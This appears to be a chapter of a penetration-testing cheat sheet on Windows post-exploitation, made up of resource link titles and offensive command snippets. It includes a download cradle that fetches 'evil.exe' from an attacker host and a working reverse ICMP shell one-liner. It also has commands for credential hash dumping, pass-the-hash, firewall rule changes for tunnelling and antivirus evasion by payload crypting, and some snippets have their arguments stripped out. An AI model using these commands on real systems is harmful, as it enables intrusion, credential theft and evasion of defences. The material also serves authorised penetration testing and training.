Skip to content

Chapter 4 - Windows Post-Exploitation

_Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator or as a Power User in Windows leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access.” _

— Indiana University Best practices for computer security

This is the phase I like to refer to as second pass enumeration or enumeration from the inside. Now that we've gained a foothold into the network it is crucial to run all of our enumeration from the ground up as an inside actor.


Windows Privilege Escalation Fundamentals - FuzzySecurity

Windows PrivEsc Check - GitHub

Windows Exploit Suggester - GitHub

Encyclopaedia Of Windows Privilege Escalation - YouTube

Level Up! Practical Windows Privilege Escalation - YouTube

Windows Privilege Escalation methods for PenTesters

Windows Attacks At is the new Black - YouTube

Well, that escalated quickly

Analyizing local privilege escalations in win2k

The System Challenge - Decoder's Blog

The Wallstreet of Windows Binaries

Windows Operating System Archaeology

Breaking .NET Through Serialization

Windows Kernel Exploits - GitHub

Cross Compiling from Kali
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
Transpile Python into EXE
Kali> python --onefile
Uploading Files
Kali> cp /usr/share/windows-binaries/nc.exe
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt
Security Stuff

Exploitation Techniques and Mitigations on Windows

Windows Exploitation

Authentication Registry Keys - MSDN

Demystifying AppContainers in Windows 8 Part 1

Protected Processes in Windows

LSA Authentication - MSDN

Intercepting System Calls on x86_64 Windows

Introduction to Windows Kernel Security

Windows 8 ASLR Internals

Windows Program Automatic Startup Locations

Demystifying the Windows Firewall

Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack

Bypassing Firewalls with Port 23

Pass the hash is dead long live LocalAccountTokenFilterPolicy


Getting Windows to play with itself: A PenTester's guide to Windows API abuse


Compromise as a Service: our pleAZURE

Powershell Foo


Attacking ADFS Endpoints with PowerShell

PowerShell AD Recon

PowerShell Secrets and Tactics

An Intro to PowerShell and how to use it for Evil

Offensive Active Directory with PowerShell

Low-Level Windows API Access From PowerShell - FuzzySecurity

PowerShell Unicorn

Sherlock for Powershell

Upgrade Shell
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('')"
echo $storageDir = $pwd > wget.ps1   
echo $webclient = New-Object System.Net.WebClient >> wget.ps1   
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1    
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\> powershell.exe -ExecutionPolicy Bypass ‐NoLogo  ‐NonInteractive  ‐NoProfile ‐File wget.ps1
Execute ps1
C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1
Stream contents of file
C:\> Get-Item /path/to/ -Stream *
Get permissions of directory/file
C:\> Get-ACL C:\path\to\file\or\directory
Packet testing
# Setup TCP Listener ie: netcat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.TcpClient;$client.Connect( "", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie")$client.Send($packet, $packet.Length);$client.Close();'

# Setup UDP Listener ie: socat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.UdpClient;$client.Connect( "", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'

Kali> sudo python $ATTACKER $TARGET
C:\> powershell -Command '$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send("", 500, $packet, $options);'
Reverse ICMP shell
Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python $ATTACKER $TARGET

C:\> powershell -nop -Command "$IP = '';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"

Windows Privilege Escalation via weak Service Permissions

The Art of Becoming TrustedInstaller


5 Ways to find Systems running domain admin processes

I hunt SysAdmins part 1

I hunt SysAdmins part 2

PenTesting Active Directory Environments: CrapMapExec

Active Directory Privilege Relationships: BloodHound

Active Directory Architecture - MSDN

A Week of Evading Microsoft ATA Day 1

Dumping a domains worth of passwords with mimikatz part 2

Attack Methods for gaining Domain Admin

Find AD users with empty passwords

Domain Trusts and why you should care

A PenTester's guide to group scoping

How to own any Windows network with group policy hijacking attacks


The Secret Life of Krbtgt

Kerberos Golden Ticket Protection

Kerberos Golden Ticket Final

Et Tu Kerberos

Abusing Microsoft Kerberos

How to pass the ticket through SSH tunnels

From Pass the Hash to Pass the Ticket with no pain

Abusing Token Privileges for LPE

Dump Hashes

Dump windows password hashes efficiently part 1

I'll get your credentials... Later! - FuzzySecurity

Grab the Windows Secrets! - Decoder's Blog

C:\> fgdump.exe
C:\> type
C:\> wce -w

You need to be an admin already it copies an executable to an admin share and registers a service and starts it

SysInternals PSExec - TechNet



PSExec Pass the Hash

Lateral Movement with Invoke-PsExec



Anatomy of UAC Attacks - FuzzySecurity


Insecure File Permissions

Elevating privileges by exploiting weak folder permissions

C:\> icacls example.exe
Insecure SYSVOL
C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt

RDP Hijacking: How to hijack RDS and RemoteApp sessions transparently to move through an organization

DLL Injection

Windows DLL Injection Basics

Portable Execution Injection

Automated DLL Enumeration

Automated DLL Injection


Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes

SMB Relay demystified and NTLMv2 Pwnage with Python

Token Stealing

Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.

Passing the Hash
Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd

Pass the Hash toolkit



Runas Reference

Encapsulating SSH Traffic with httptunnel
# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automtion.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1

# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name ="httptunnel_client" dir=in action=allow program="httptunnel_client.exe enable=yes
C:\> netsh advfirewall firewall add rule name ="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080 dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe

# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389: -P 3000

# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/ .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe